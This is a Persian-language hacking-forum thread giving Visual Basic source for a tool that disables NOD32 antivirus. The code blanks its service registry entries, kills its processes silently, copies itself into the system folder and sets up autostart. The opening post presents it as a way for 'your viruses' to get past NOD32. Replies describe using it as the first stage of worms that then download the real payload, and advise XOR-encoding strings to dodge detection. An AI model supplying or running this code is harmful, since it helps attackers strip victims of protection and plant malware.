امتیاز موضوع:
  • 1 رأی - میانگین امتیازات: 5
  • 1
  • 2
  • 3
  • 4
  • 5
ساخت برنامه ی از کار انداختن آنتی ویروس nod32
نویسنده پیام
ΛΛ Θ l-l $ Σ Ω آفلاین
کاربر با تجربه
****

ارسال‌ها: 739
موضوع‌ها: 147
تاریخ عضویت: مهر ۱۳۸۶

تشکرها : 219
( 187 تشکر در 98 ارسال )
ارسال: #1
ساخت برنامه ی از کار انداختن آنتی ویروس nod32
برای این کار باید 6 مرحله را بگذرانید:


1-ویژوال بیسیک را اجرا کنید.standard exe را انتخاب و یک command و یک timer هم به form اضافه کنید و interval timer هم برابر 3000 قرار دهید.



2-روی form دو بار کلیک کنید و کدهای زیر را درونش وارد کنید:



n = 30

App.TaskVisible = False

If App.Path = SysDir Then

Me.Hide

App.TaskVisible = False

Command1_Click

End If



3-روی command دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:



SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "AntiNod32", SysDir & "\antinod32.exe"

Shell "taskkill /f /im NOD32KRN.EXE", vbHide

Shell "taskkill /f /im NOD32KUI.EXE", vbHide

If App.Path <> SysDir Then

MsgBox "Nod32 Anti Virus Disabled Successfull !", vbInformation, "Anti Nod32"

FileCopy App.Path & "\" & App.EXEName & ".exe", SysDir & "\" & "antinod32.exe"

End If



4-در قسمت general فرم کد زیر را وارد کنید:

Dim n As Integer



5-در مرحله آخر،روی timer دوبار کلیک کنید و کدهای زیر را وارد کنید:



SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn", "ImagePath", ""

SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", "AntiNod32", SysDir & "\antinod32.exe"

Shell "taskkill /f /im NOD32KRN.EXE", vbHide

Shell "taskkill /f /im NOD32KUI.EXE", vbHide



6-یک module درست کنید(از منوی project ) و کدهای زیر را درونش کپی کنید:



Public Const HKEY_LOCAL_MACHINE = &H80000002

Public Const HKEY_CURRENT_USER = &H80000001

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long

Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long

Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long

Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Const REG_SZ = 1

Public Const REG_DWORD = 4

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long



Public Function SysDir() As String

Dim SysPath As String

SysPath = String(255, vbNullChar)

GetSystemDirectory SysPath, 255

SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)

End Function

Public Function exist(name As String) As Boolean

exist = (Dir(name, vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbArchive) <> "")

End Function

Public Function GetString(Hkey As Long, strPath As String, strValue As String)

Dim keyhand As Long

Dim datatype As Long

Dim lResult As Long

Dim strBuf As String

Dim lDataBufSize As Long

Dim intZeroPos As Integer

r = RegOpenKey(Hkey, strPath, keyhand)

lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)

If lValueType = REG_SZ Then

strBuf = String(lDataBufSize, " ")

lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)

If lResult = ERROR_SUCCESS Then

intZeroPos = InStr(strBuf, Chr$(0))

If intZeroPos > 0 Then

GetString = Left$(strBuf, intZeroPos - 1)

Else

GetString = strBuf

End If

End If

End If

End Function



Public Sub SaveString(Hkey As Long, strPath As String, strValue As String, strdata As String)

Dim keyhand As Long

Dim r As Long

r = RegCreateKey(Hkey, strPath, keyhand)

r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))

r = RegCloseKey(keyhand)

End Sub



Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)

Dim lResult As Long

Dim keyhand As Long

Dim r As Long

r = RegCreateKey(Hkey, strPath, keyhand)

lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)

r = RegCloseKey(keyhand)

End Function



تبریک می گم.حالا دیگه ویروس های شما از سد آنتی ویروس nod32 هم می گذرد.

Exclamation
۰۱-آذر-۱۳۸۶, ۱۳:۲۲:۱۱
ارسال‌ها
پاسخ
تشکر شده توسط : Arash12
godvb غایب
مدیر بازنشسته بخش نفوذ و امنیت
*****

ارسال‌ها: 430
موضوع‌ها: 77
تاریخ عضویت: اسفند ۱۳۸۶

تشکرها : 886
( 1338 تشکر در 343 ارسال )
ارسال: #2
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
اقا جون نود 32 تو حال كردم . با حال بود . فاز دادي . خدا بهت فاز بده

آنچه توانسته ایم انجام دهیم، لطف پرودگار بوده است.

XMen For Ever
۲۵-اسفند-۱۳۸۶, ۱۳:۰۶:۰۸
ارسال‌ها
پاسخ
mahyar 69 آفلاین
كاربر تک ستاره
*

ارسال‌ها: 34
موضوع‌ها: 11
تاریخ عضویت: فروردین ۱۳۸۷

تشکرها : 5
( 28 تشکر در 12 ارسال )
ارسال: #3
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
خوب چه فايده داره آقاي mohsen_f وقتي قبل از اينكه برنامه بتونه كار خودشو انجام بده آنتي ويروس اونو ويروس شناسايي ميكنه.

۱۶-اردیبهشت-۱۳۸۷, ۰۶:۴۲:۰۱
ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #4
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
mahyar 69 نوشته است:خوب چه فايده داره آقاي mohsen_f وقتي قبل از اينكه برنامه بتونه كار خودشو انجام بده آنتي ويروس اونو ويروس شناسايي ميكنه.
از اين روش در ويروسها و كرمهاي چند بخشي استفاده ميشه بخش اول كه يه برنامه مثبت هست ابتدا وارد سيستم طرف ميشه چون كدهاي مخرب توش نداره پس انتيها بهش گير نميدن اين برنامه اول انتي ها رو غير فعال ميكنه با استفاده از تكنيكهاي خودش بعد از اماده شدن سيستم بعد از اتصال بعد به اينترنت بخش دوم يا ويروس اصلي رو دانلود و روي سيستم اجرا ميكنه
۱۶-اردیبهشت-۱۳۸۷, ۱۲:۱۹:۳۹
وب سایت ارسال‌ها
پاسخ
HoseinVig آفلاین
مدیر بازنشسته
*****

ارسال‌ها: 1,165
موضوع‌ها: 97
تاریخ عضویت: مرداد ۱۳۸۵

تشکرها : 4768
( 2464 تشکر در 677 ارسال )
ارسال: #5
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
lord_viper نوشته است:
mahyar 69 نوشته است:خوب چه فايده داره آقاي mohsen_f وقتي قبل از اينكه برنامه بتونه كار خودشو انجام بده آنتي ويروس اونو ويروس شناسايي ميكنه.
از اين روش در ويروسها و كرمهاي چند بخشي استفاده ميشه بخش اول كه يه برنامه مثبت هست ابتدا وارد سيستم طرف ميشه چون كدهاي مخرب توش نداره پس انتيها بهش گير نميدن اين برنامه اول انتي ها رو غير فعال ميكنه با استفاده از تكنيكهاي خودش بعد از اماده شدن سيستم بعد از اتصال بعد به اينترنت بخش دوم يا ويروس اصلي رو دانلود و روي سيستم اجرا ميكنه

روش خیلی جالبیه! حال کردم خیلی شیطونیه
اینجور روش ها رو میتونیم از کجا یاد بگیریم(غیر از شیطنت های خودمون)
منبعی چیزی سراغ نداری...؟

۱۶-اردیبهشت-۱۳۸۷, ۱۶:۱۹:۵۸
ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #6
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
منبع خاصي رو نت سراغ ندارم ولي بعضي از كرمها از اين تكنيك استفاده ميكنن
(خودمم يه بار استفاده كردم)چون دور زدن بخش demon انتي كسپر وقتي اجرا باشه خيلي سخته و به احتمال 90% اگه اسكن قبل از اجرا رو هم با پك كردن هم رد كرده باشي باز گير ميافته
۱۶-اردیبهشت-۱۳۸۷, ۱۸:۰۹:۵۴
وب سایت ارسال‌ها
پاسخ
mahyar 69 آفلاین
كاربر تک ستاره
*

ارسال‌ها: 34
موضوع‌ها: 11
تاریخ عضویت: فروردین ۱۳۸۷

تشکرها : 5
( 28 تشکر در 12 ارسال )
ارسال: #7
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
lord_viper نوشته است:
mahyar 69 نوشته است:خوب چه فايده داره آقاي mohsen_f وقتي قبل از اينكه برنامه بتونه كار خودشو انجام بده آنتي ويروس اونو ويروس شناسايي ميكنه.
از اين روش در ويروسها و كرمهاي چند بخشي استفاده ميشه بخش اول كه يه برنامه مثبت هست ابتدا وارد سيستم طرف ميشه چون كدهاي مخرب توش نداره پس انتيها بهش گير نميدن اين برنامه اول انتي ها رو غير فعال ميكنه با استفاده از تكنيكهاي خودش بعد از اماده شدن سيستم بعد از اتصال بعد به اينترنت بخش دوم يا ويروس اصلي رو دانلود و روي سيستم اجرا ميكنه

عزيز اين روشهارو ما كهنه كرديم .Whistle. مساله اينجاست كه nod32 3 اون تيكه اول برنامه كه مربوط به غير فعال كردن آنتي ويروساست ( وبايد اول اجرا بشه بعد ادامه كار يعني بخش مخرب شروع بكار كنه ) رو مخرب شناسايي ميكنه.Sad.
منظور من رو فهميديد ؟
البته من راههايي رو در ذهن دارم اما هنوز اجرا نكردم.

۱۸-اردیبهشت-۱۳۸۷, ۰۷:۵۷:۳۱
ارسال‌ها
پاسخ
Morpheus آفلاین
كاربر دو ستاره
**

ارسال‌ها: 142
موضوع‌ها: 14
تاریخ عضویت: آبان ۱۳۸۷

تشکرها : 51
( 104 تشکر در 49 ارسال )
ارسال: #8
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
می دونستید Node32 رو با EndProcess توTaskmgr میشه از کار انداختش!!!!
خوب یه کد بنویسید که تو لیست Taskmgr چک کنه Node32 دید از کاربندازتش

اگه یه روز به یک در بزرگ رسیدی که یه قفل بزرگ داشت نترس و ناامید نشو چون اگه قرار بود قفل باز نشه جای در دیوار بود.
۲۲-آبان-۱۳۸۷, ۲۲:۵۱:۰۱
ارسال‌ها
پاسخ
Di Di آفلاین
مدير بخش هك و كرك
*****

ارسال‌ها: 2,358
موضوع‌ها: 116
تاریخ عضویت: اسفند ۱۳۸۵

تشکرها : 1816
( 4046 تشکر در 1321 ارسال )
ارسال: #9
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
دوست عزيز

NOD32 اگه در حال اجرا باشه حداقل 3 تا پروسه قابل مشاهده در تسك منيجر داره كه شما اگه دسترسي ادمين

داشته باشيد تنها مي تونيد يكي از اونها رو ببنديد كه بيشتر نقش اينترفيس آتي رو داره و اخلال چنداني در كار

آنتي ويروس ايجاد نمي كنه.

۲۳-آبان-۱۳۸۷, ۰۹:۱۵:۰۳
وب سایت ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #10
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
(۱۸-اردیبهشت-۱۳۸۷, ۰۷:۵۷:۳۱)mahyar 69 نوشته است:
lord_viper نوشته است:
mahyar 69 نوشته است:خوب چه فايده داره آقاي mohsen_f وقتي قبل از اينكه برنامه بتونه كار خودشو انجام بده آنتي ويروس اونو ويروس شناسايي ميكنه.
از اين روش در ويروسها و كرمهاي چند بخشي استفاده ميشه بخش اول كه يه برنامه مثبت هست ابتدا وارد سيستم طرف ميشه چون كدهاي مخرب توش نداره پس انتيها بهش گير نميدن اين برنامه اول انتي ها رو غير فعال ميكنه با استفاده از تكنيكهاي خودش بعد از اماده شدن سيستم بعد از اتصال بعد به اينترنت بخش دوم يا ويروس اصلي رو دانلود و روي سيستم اجرا ميكنه

عزيز اين روشهارو ما كهنه كرديم .Whistle. مساله اينجاست كه nod32 3 اون تيكه اول برنامه كه مربوط به غير فعال كردن آنتي ويروساست ( وبايد اول اجرا بشه بعد ادامه كار يعني بخش مخرب شروع بكار كنه ) رو مخرب شناسايي ميكنه.Sad.
منظور من رو فهميديد ؟
البته من راههايي رو در ذهن دارم اما هنوز اجرا نكردم.
این در صورتی هیت که string های برنامه همینجور معمولی استفاده بشه شما باید String های برنامه رو کد کنید مثلا xor البته نباید خیلی ساده باشه چون نود چند تکنیک برای دیکریپت کردن داره وقتی نتونه ادرسهای رجیستری و اسم خودشو شخیص بده مطمعنا نمیتونه این برنامه رو بدافزار تشخیص بده
۲۳-آبان-۱۳۸۷, ۱۰:۳۵:۰۹
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : saeid114
yeketaz آفلاین
کاربر با تجربه
****

ارسال‌ها: 744
موضوع‌ها: 123
تاریخ عضویت: اسفند ۱۳۸۶

تشکرها : 520
( 1050 تشکر در 294 ارسال )
ارسال: #11
RE: ساخت برنامه ی از کار انداختن آنتی ویروس nod32
نقل قول: دوست عزيز

NOD32 اگه در حال اجرا باشه حداقل 3 تا پروسه قابل مشاهده در تسك منيجر داره كه شما اگه دسترسي ادمين

داشته باشيد تنها مي تونيد يكي از اونها رو ببنديد كه بيشتر نقش اينترفيس آتي رو داره و اخلال چنداني در كار

آنتي ويروس ايجاد نمي كنه.

آقا مهدی الان که من دیدم دو تا پروسه هست که یکیش سیستمیه و اون یکیش همون اینترفیسه

ما که دیگه توی ایران ویج پیر شدیم 040 کم کم باید جامون رو بدیم به جوونا 028
۲۳-آبان-۱۳۸۷, ۱۹:۲۷:۵۴
وب سایت ارسال‌ها
پاسخ


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  ویروس Indian grl.avi.exe salehjg 6 19,801 ۰۴-آذر-۱۳۹۴, ۱۷:۵۶:۴۹
آخرین ارسال: alimogmov
  ویروس aleas 26 24,327 ۰۵-مهر-۱۳۹۳, ۲۱:۲۳:۵۱
آخرین ارسال: STR_virus
  ویروس جدید!!! hadikh73 9 7,298 ۰۴-اسفند-۱۳۹۲, ۱۳:۰۸:۵۶
آخرین ارسال: godvb
  درخواست سورس چند تا ویروس به زبان c jaber 9 11,122 ۲۲-شهریور-۱۳۹۲, ۱۲:۳۷:۱۴
آخرین ارسال: Ghoghnus
  ویروس الوده کننده فایل های اجرایی elsecret 3 5,547 ۱۹-شهریور-۱۳۹۲, ۱۱:۵۲:۰۱
آخرین ارسال: kogo
  [پروژه] سورس چند ویروس Fery666 6 6,587 ۰۷-شهریور-۱۳۹۲, ۱۷:۵۷:۴۲
آخرین ارسال: Ghoghnus
  درخواست سورس ویروس زمانی rap0661 3 5,221 ۳۰-اردیبهشت-۱۳۹۲, ۱۰:۴۳:۳۲
آخرین ارسال: A.P-H@ck3r
  ویروس نویسی با چی؟ mohamadpk 13 16,816 ۳۰-اردیبهشت-۱۳۹۲, ۱۰:۰۷:۱۸
آخرین ارسال: A.P-H@ck3r
  ویروس funny.exe abbasalifix 23 23,891 ۲۸-اردیبهشت-۱۳۹۲, ۱۴:۴۰:۳۷
آخرین ارسال: A.P-H@ck3r
  ویروس چندریخت حمزه 327 5 5,863 ۰۹-فروردین-۱۳۹۲, ۲۳:۵۴:۲۱
آخرین ارسال: A.P-H@ck3r

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 2 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS